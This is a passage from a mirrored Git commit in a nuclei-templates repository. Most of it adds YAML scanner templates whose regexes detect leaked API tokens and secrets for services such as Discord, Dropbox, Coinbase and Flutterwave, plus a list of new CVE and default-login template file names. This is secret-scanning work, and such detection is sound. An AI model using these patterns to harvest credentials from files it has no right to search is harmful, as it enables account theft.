daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'main' into jarm-c2-detect

patch-1
pussycat0x 2023-07-18 13:19:58 +05:30 committed by GitHub
parent 197d816040 35de9a4ee8
commit 5182daf53b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2067 changed files with 18626 additions and 9621 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
.github/workflows/template-validate.yml vendored
View File

@ -25,5 +25,5 @@ jobs:
- name: Template Validation
run: |
cp -r ${{ github.workspace }} $HOME
nuclei -duc -validate
nuclei -duc -validate -w ./workflows
nuclei -duc -validate -allow-local-file-access
nuclei -duc -validate -w ./workflows -allow-local-file-access

93
.new-additions
View File

@ -1,3 +1,94 @@
file/keys/beamer-api-token.yaml
file/keys/bitbucket/bitbucket-client-id.yaml
file/keys/bitbucket/bitbucket-client-secret.yaml
file/keys/bittrex/bittrex-access-key.yaml
file/keys/bittrex/bittrex-secret-key.yaml
file/keys/clojars-api-token.yaml
file/keys/codecov-access-token.yaml
file/keys/coinbase-access-token.yaml
file/keys/confluent/confluent-access-token.yaml
file/keys/confluent/confluent-secret-token.yaml
file/keys/contentful-api-token.yaml
file/keys/databricks-api-token.yaml
file/keys/datadog-access-token.yaml
file/keys/discord/discord-api-token.yaml
file/keys/discord/discord-cilent-secret.yaml
file/keys/discord/discord-client-id.yaml
file/keys/doppler-api-token.yaml
file/keys/droneci-access-token.yaml
file/keys/dropbox/dropbox-api-token.yaml
file/keys/dropbox/dropbox-longlived-token.yaml
file/keys/dropbox/dropbox-shortlived-token.yaml
file/keys/duffel-api-token.yaml
file/keys/easypost/easypost-api-token.yaml
file/keys/easypost/easypost-test-token.yaml
file/keys/etsy-access-token.yaml
file/keys/facebook/facebook-api-token.yaml
file/keys/fastly-api-token.yaml
file/keys/finicity/finicity-api-token.yaml
file/keys/finicity/finicity-client-secret.yaml
file/keys/finnhub-access-token.yaml
file/keys/flickr-access-token.yaml
file/keys/flutter/flutterwave-encryption-key.yaml
file/keys/flutter/flutterwave-public-key.yaml
file/keys/flutter/flutterwave-secret-key.yaml
file/keys/frameio-api-token.yaml
file/keys/freshbooks-access-token.yaml
file/keys/gitter-access-token.yaml
file/keys/gocardless-api-token.yaml
file/keys/grafana/grafana-api-key.yaml
file/keys/grafana/grafana-cloud-api-token.yaml
file/keys/grafana/grafana-service-account-token.yaml
file/keys/hashicorp-api-token.yaml
file/keys/zendesk-secret-key.yaml
http/cves/2017/CVE-2017-7925.yaml
http/cves/2023/CVE-2023-28665.yaml
http/cves/2023/CVE-2023-3345.yaml
http/cves/2023/CVE-2023-3460.yaml
http/cves/2023/CVE-2023-37270.yaml
miscellaneous/spnego.yaml
http/default-logins/yealink/yealink-default-login.yaml
http/exposed-panels/anaqua-login-panel.yaml
http/exposures/tokens/beamer/beamer-token.yaml
http/exposures/tokens/bitbucket/bitbucket-clientid.yaml
http/exposures/tokens/bitbucket/bitbucket-clientsecret.yaml
http/exposures/tokens/bittrex/bittrex-accesskey.yaml
http/exposures/tokens/bittrex/bittrex-secretkey.yaml
http/exposures/tokens/clojars/clojars-token.yaml
http/exposures/tokens/codecov/codecov-accesstoken.yaml
http/exposures/tokens/coinbase/coinbase-accesstoken.yaml
http/exposures/tokens/confluent/confluent-accesstoken.yaml
http/exposures/tokens/confluent/confluent-secretkey.yaml
http/exposures/tokens/contentful/contentful-token.yaml
http/exposures/tokens/databricks/databricks-token.yaml
http/exposures/tokens/datadog/datadog-accesstoken.yaml
http/exposures/tokens/discord/discord-clientid.yaml
http/exposures/tokens/discord/discord-clientsecret.yaml
http/exposures/tokens/discord/discord-token.yaml
http/exposures/tokens/doppler/doppler-token.yaml
http/exposures/tokens/droneci/droneci-accesstoken.yaml
http/exposures/tokens/dropbox/dropbox-long-token.yaml
http/exposures/tokens/dropbox/dropbox-short-token.yaml
http/exposures/tokens/dropbox/dropbox-token.yaml
http/exposures/tokens/duffel/duffel-token.yaml
http/exposures/tokens/easypost/easypost-testtoken.yaml
http/exposures/tokens/easypost/easypost-token.yaml
http/exposures/tokens/etsy/etsy-accesstoken.yaml
http/exposures/tokens/facebook/facebook-token.yaml
http/exposures/tokens/fastly/fastly-token.yaml
http/exposures/tokens/finicity/finicity-clientsecret.yaml
http/exposures/tokens/finicity/finicity-token.yaml
http/exposures/tokens/finnhub/finnhub-accesstoken.yaml
http/exposures/tokens/flickr/flickr-accesstoken.yaml
http/exposures/tokens/flutter/flutterwave-encryptionkey.yaml
http/exposures/tokens/flutter/flutterwave-publickey.yaml
http/exposures/tokens/flutter/flutterwave-secretkey.yaml
http/exposures/tokens/frameio/frameio-token.yaml
http/exposures/tokens/freshbooks/freshbooks-accesstoken.yaml
http/exposures/tokens/gitter/gitter-token.yaml
http/exposures/tokens/gocardless/gocardless-token.yaml
http/exposures/tokens/grafana/grafana-cloud-token.yaml
http/exposures/tokens/grafana/grafana-key.yaml
http/exposures/tokens/grafana/grafana-serviceaccount-token.yaml
http/exposures/tokens/hashicorp/hashicorp-token.yaml
http/exposures/tokens/zendesk/zendesk-key.yaml
http/miscellaneous/spnego.yaml

22
file/keys/beamer-api-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: beamer-api-token
info:
name: Beamer API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/beamer-api-token.go
metadata:
verified: true
tags: beamer,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:beamer)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(b_[a-z0-9=_\-]{44})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/bitbucket/bitbucket-client-id.yaml Normal file
View File

@ -0,0 +1,22 @@
id: bitbucket-client-id
info:
name: BitBucket Client ID
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.go
metadata:
verified: true
tags: bitbucket,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/bitbucket/bitbucket-client-secret.yaml Normal file
View File

@ -0,0 +1,22 @@
id: bitbucket-client-secret
info:
name: BitBucket Client Secret
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.go
metadata:
verified: true
tags: bitbucket,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:bitbucket)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/bittrex/bittrex-access-key.yaml Normal file
View File

@ -0,0 +1,22 @@
id: bittrex-access-key
info:
name: Bittrex Access Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.go
metadata:
verified: true
tags: bittrex,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/bittrex/bittrex-secret-key.yaml Normal file
View File

@ -0,0 +1,22 @@
id: bittrex-secret-key
info:
name: Bittrex Secret Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.go
metadata:
verified: true
tags: bittrex,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:bittrex)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/clojars-api-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: clojars-api-token
info:
name: Clojars API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/clojars-api-token.go
metadata:
verified: true
tags: clojars,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(CLOJARS_)[a-z0-9]{60}

22
file/keys/codecov-access-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: codecov-access-token
info:
name: Codecov Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/codecov-access-token.go
metadata:
verified: true
tags: codecov,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:codecov)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/coinbase-access-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: coinbase-access-token
info:
name: Coinbase Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/coinbase-access-token.go
metadata:
verified: true
tags: coinbase,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:coinbase)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9_-]{64})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/confluent/confluent-access-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: confluent-access-token
info:
name: Confluent Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.go
metadata:
verified: true
tags: confluent,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{16})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/confluent/confluent-secret-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: confluent-secret-token
info:
name: Confluent Secret Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.go
metadata:
verified: true
tags: confluent,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:confluent)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/contentful-api-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: contentful-api-token
info:
name: Contentful Delivery API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/contentful-delivery-api-token.go
metadata:
verified: true
tags: contentful,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:contentful)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{43})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/databricks-api-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: databricks-api-token
info:
name: Databricks API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/databricks-api-token.go
metadata:
verified: true
tags: databricks,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)\b(dapi[a-h0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/datadog-access-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: datadog-access-token
info:
name: Datadog Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/datadog-access-token.go
metadata:
verified: true
tags: datadog,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:datadog)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{40})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/discord/discord-api-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: discord-api-token
info:
name: Discord API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.go
metadata:
verified: true
tags: discord,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{64})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/discord/discord-cilent-secret.yaml Normal file
View File

@ -0,0 +1,22 @@
id: discord-client-secret
info:
name: Discord Client Secret
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.go
metadata:
verified: true
tags: discord,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/discord/discord-client-id.yaml Normal file
View File

@ -0,0 +1,22 @@
id: discord-client-id
info:
name: Discord Client ID
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.go
metadata:
verified: true
tags: discord,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:discord)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([0-9]{18})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/doppler-api-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: doppler-api-token
info:
name: Doppler API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/doppler-api-token.go
metadata:
verified: true
tags: doppler,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (dp\.pt\.)(?i)[a-z0-9]{43}

22
file/keys/droneci-access-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: droneci-access-token
info:
name: Droneci Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/droneci-access-token.go
metadata:
verified: true
tags: droneci,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:droneci)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/dropbox/dropbox-api-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: dropbox-api-token
info:
name: Dropbox API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.go
metadata:
verified: true
tags: dropbox,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{15})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/dropbox/dropbox-longlived-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: dropbox-longlived-token
info:
name: Dropbox Long Lived API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.go
metadata:
verified: true
tags: dropbox,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{11}(AAAAAAAAAA)[a-z0-9\-_=]{43})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/dropbox/dropbox-shortlived-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: dropbox-shortlived-token
info:
name: Dropbox Short Lived API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.go
metadata:
verified: true
tags: dropbox,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:dropbox)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}(sl\.[a-z0-9\-=_]{135})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/duffel-api-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: duffel-api-token
info:
name: Duffel API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/duffel-api-token.go
metadata:
verified: true
tags: duffel,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- duffel_(test|live)_(?i)[a-z0-9_\-=]{43}

22
file/keys/easypost/easypost-api-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: easypost-api-token
info:
name: Easypost Test API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.go
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.yaml
metadata:
verified: true
tags: easypost,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- EZAK(?i)[a-z0-9]{54}

22
file/keys/easypost/easypost-test-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: easypost-test-token
info:
name: Easypost Test API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.go
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.yaml
metadata:
verified: true
tags: easypost,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- EZTK(?i)[a-z0-9]{54}

22
file/keys/etsy-access-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: etsy-access-token
info:
name: Etsy Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.go
metadata:
verified: true
tags: etsy,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:etsy)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{24})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/facebook/facebook-api-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: facebook-api-token
info:
name: Facebook API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.go
metadata:
verified: true
tags: facebook,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:facebook)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/fastly-api-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: fastly-api-token
info:
name: Fastly API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.go
metadata:
verified: true
tags: fastly,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:fastly)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9=_\-]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/finicity/finicity-api-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: finicity-api-token
info:
name: Finicity API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.go
metadata:
verified: true
tags: finicity,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-f0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/finicity/finicity-client-secret.yaml Normal file
View File

@ -0,0 +1,22 @@
id: finicity-client-secret
info:
name: Finicity Client Secret
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.go
metadata:
verified: true
tags: finicity,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:finicity)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/finnhub-access-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: finnhub-access-token
info:
name: Finnhub Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.go
metadata:
verified: true
tags: finnhub,file,token
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:finnhub)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{20})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/flickr-access-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: flickr-access-token
info:
name: Flickr Access Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flickr-access-token.go
metadata:
verified: true
tags: flickr,file,keys
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- (?i)(?:flickr)(?:[0-9a-z\-_\t .]{0,20})(?:[\s|']|[\s|"]){0,3}(?:=|>|:=|\|\|:|<=|=>|:)(?:'|\"|\s|=|\x60){0,5}([a-z0-9]{32})(?:['|\"|\n|\r|\s|\x60|;]|$)

22
file/keys/flutter/flutterwave-encryption-key.yaml Normal file
View File

@ -0,0 +1,22 @@
id: flutterwave-encryption-key
info:
name: Flutterwave Encryption Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.go
metadata:
verified: true
tags: flutter,file,keys,flutterwave
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- FLWSECK_TEST-(?i)[a-h0-9]{12}

22
file/keys/flutter/flutterwave-public-key.yaml Normal file
View File

@ -0,0 +1,22 @@
id: flutterwave-public-key
info:
name: Flutterwave Public Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.go
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.yaml
metadata:
verified: true
tags: flutter,file,keys,flutterwave
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- FLWPUBK_TEST-(?i)[a-h0-9]{32}-X

22
file/keys/flutter/flutterwave-secret-key.yaml Normal file
View File

@ -0,0 +1,22 @@
id: flutterwave-secret-key
info:
name: Flutterwave Secret Key
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.yaml
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.go
metadata:
verified: true
tags: flutter,file,keys,flutterwave
file:
- extensions:
- all
extractors:
- type: regex
part: body
regex:
- FLWSECK_TEST-(?i)[a-h0-9]{32}-X

22
file/keys/frameio-api-token.yaml Normal file
View File

@ -0,0 +1,22 @@
id: frameio-api-token
info:
name: Frameio API Token
author: DhiyaneshDK
severity: info
reference:
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/frameio-api-token.yaml
